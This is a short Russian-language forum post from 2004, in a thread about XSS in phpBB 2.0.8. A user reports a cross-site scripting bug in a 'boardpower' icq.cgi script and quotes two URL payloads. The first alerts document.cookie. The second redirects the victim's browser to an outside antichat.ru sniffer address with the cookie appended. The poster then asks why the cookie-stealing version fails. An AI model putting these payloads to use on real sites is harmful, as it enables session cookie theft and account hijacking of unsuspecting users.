Тема: Xss в phpBB 2.0.8
Показать сообщение отдельно

  #3  
Старый 06.08.2004, 13:15
DDF
Новичок
Регистрация: 05.08.2004
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Вот нашел boardpower баг работаюший если так
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=<script&gt;javascript:alert(documen t.cookie);&lt;/script&gt;[/QUOTE]<span id='postcolor'>
показивает как надо, но если так
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=%3Cscript%3Ewindow.location='http://antichat.ru/cgi-bin/s.jpg?Info='+document.cookie%3C/script%3E[/QUOTE]<span id='postcolor'>
то неработает.
почему &nbsp;window.location неработает?
 
Ответить с цитированием